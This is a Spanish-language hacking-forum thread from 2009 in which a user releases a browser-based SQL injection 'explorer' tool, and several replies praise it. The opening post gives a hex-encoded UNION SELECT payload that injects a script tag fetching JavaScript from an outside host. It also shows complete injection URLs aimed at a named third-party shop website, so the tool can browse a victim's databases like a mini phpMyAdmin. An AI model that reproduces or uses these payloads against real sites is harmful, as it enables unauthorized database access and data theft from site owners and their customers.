Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: Pony-Magic en 13 Diciembre 2009, 00:28 am


Título: MySQLi | General Inejction Explorer | By PonyMagic
Publicado por: Pony-Magic en 13 Diciembre 2009, 00:28 am
General Injection Explorer 3.0
by PonyMagic

[?] Que es?
Basicamente es un explorador de bases de datos MySQL via SQLi, "incrustado" en la inyeccion.

[!] Que tiene la version 3.0?
  • Codeado desde 0.
  • Bypasseo de "illegal operation", y limite de group_concat_max_len.
  • Mejor manejo de CSS && DIVS.
  • Peticiones realizadas con AJAX.
  • Nueva forma de ver tablas, MUCHO mas ordenadas.

[?] Como se usa?
En una SQLi, unis otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
En un valor que printee (que se muestre en la web), simplemente copias y pegas el codigo de la GIE.

Código:
(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)

Ejemplo:
adegasgalegas.es SQLi (http://www.adegasgalegas.es/en/html/comprar.php?id=-1 UNION SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--)
adegasgalegas.es GIE SQLi (http://www.adegasgalegas.es/en/html/comprar.php?id=-1 UNION SELECT 0,1,(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--)



(http://i45.tinypic.com/2e4lqtd.jpg)

Injeccion con General Injection Explorer 3.0

Luego, se navegan las bases de datos, usando ese "cuadradito" como un mini-phpmyadmin :P como se ve en el siguiente [.gif]:
(http://img692.imageshack.us/img692/9366/84930379.gif)

  • Gracias a virtux por hostear, acá tienen el código y el link:
Link JS (http://virtux.com.ar/GIE/_.js)
Link Paste2 [Highlight] (http://paste2.org/p/558258)



Título: Re: MySQLi | General Inejction Explorer | By PonyMagic
Publicado por: WHK en 13 Diciembre 2009, 03:28 am
Está super bueno, me gustó me gustó me gustó  :D

PD:
Donde dice:
Código
  1. document.write("
  2.  background: url(
  3.   'http://www.diosdelared.com/blogs/themes/blackcyan/imagenes/bg.jpg'
  4.  ) #000;z-index:1002;overflow: auto;}
  5. "); // background

Podrías apuntar hacia otra web? xD ya que cuando se incluya esa imagen la referencia de la inyección se enviará a su web dejando en su log de acceso las inyecciones que alguien podría encontrar y utilizar con este script.

A mi me gustaría mucho si pudieras reemplazar el buffer de las imagenes con string en base64 y data/*; o simplemente hacerlo sin imagenes y evitar la dependencia de inclusiones externas.

Título: Re: MySQLi | General Inejction Explorer | By PonyMagic
Publicado por: Pony-Magic en 13 Diciembre 2009, 04:23 am
gracias por el dato, lo voy a tener en cuenta!
si alguien tiene alguna critica "constructiva" o no   :P
por favor que comente, asi la proxima queda mejor  :)

Título: Re: MySQLi | General Inejction Explorer | By PonyMagic
Publicado por: braulio-- en 13 Diciembre 2009, 14:58 pm
Es la mejor herramienta para estas labores que he visto.
Tuviste una idea impresionante  ;-) ;-) ;-)

Título: Re: MySQLi | General Inejction Explorer | By PonyMagic
Publicado por: xassiz_ en 13 Diciembre 2009, 16:37 pm
Increíble ;-)

Título: Re: MySQLi | General Inejction Explorer | By PonyMagic
Publicado por: fede_cp en 13 Diciembre 2009, 18:07 pm
sisi!, esta muy buena, genial.

segui así



saludos

Título: Re: MySQLi | General Inejction Explorer | By PonyMagic
Publicado por: Banti en 13 Diciembre 2009, 23:31 pm
Grozo!!!
Ahora no necesitas conocimientos de mysql para hacer inyecciones :P

@WHK:
Te pregunto por ignorante...
Que es el buffer de imagen? Y que necesidad para que este cifrado?

Título: Re: MySQLi | General Inejction Explorer | By PonyMagic
Publicado por: YST en 14 Diciembre 2009, 02:37 am
Cita de: Vaati en 13 Diciembre 2009, 23:31 pm
Grozo!!!
Ahora no necesitas conocimientos de mysql para hacer inyecciones :P

@WHK:
Te pregunto por ignorante...
Que es el buffer de imagen? Y que necesidad para que este cifrado?

cifra la imagen en base64 y se la pasa al firefox pàra que la muestre :P Sin necesidad de sacarla de alguna web ;)

Título: Re: MySQLi | General Inejction Explorer | By PonyMagic
Publicado por: kamsky en 14 Diciembre 2009, 11:21 am
Citar
cifra la imagen en base64
Más que cifrar, codificar

Título: Re: MySQLi | General Inejction Explorer | By PonyMagic
Publicado por: YST en 14 Diciembre 2009, 20:14 pm
Cita de: kamsky en 14 Diciembre 2009, 11:21 am
Citar
cifra la imagen en base64
Más que cifrar, codificar

Toda la razón kamsky ;)

Título: Re: MySQLi | General Inejction Explorer | By PonyMagic
Publicado por: Nakp en 14 Diciembre 2009, 21:10 pm
muy bueno xD aunque por el título pense que vulnerabas mysqli de php xDDD no se, me imagine las prepared statements o algo asi jaja

Título: Re: MySQLi | General Inejction Explorer | By PonyMagic
Publicado por: OzX en 14 Diciembre 2009, 21:12 pm
el concepto lo encontre genial.
Buen proyecto bro.

Saludos¡

Título: Re: MySQLi | General Inejction Explorer | By PonyMagic
Publicado por: alexkof158 en 15 Diciembre 2009, 10:07 am
me siento feliz al haberme registrado en esta comunidad, llegan sorprendentes aportes cada dia,DIOSSSSSSSSSSSSSSSSSSSSSSSSS


excelente trabajo  ;-)


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines